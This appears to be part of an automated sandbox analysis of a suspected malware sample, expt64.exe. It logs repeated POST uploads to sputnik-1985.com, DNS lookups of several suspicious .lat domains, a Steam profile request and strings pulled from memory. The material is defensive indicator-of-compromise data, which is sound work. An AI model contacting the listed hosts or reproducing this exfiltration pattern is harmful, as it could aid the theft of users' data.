Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WAVL3SHFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12784Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1K58B3BFUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15031Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LCECPHTHGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20206Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=075K4N27BXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZIOL9PUC4FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1065Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /j(/jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b84af25699299731d3a2833f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:36:20 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ ht[ equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src equals www.youtube.com (Youtube)
Source: expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: brendon-sharjen.biz
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: expt64.exe, 00000000.00000003.2544998470.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2530528245.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: expt64.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: expt64.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: expt64.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: expt64.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: expt64.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: expt64.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: expt64.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: expt64.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: expt64.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: expt64.exe	String found in binary or memory: http://ocsp.sectigo.com05
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampows
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
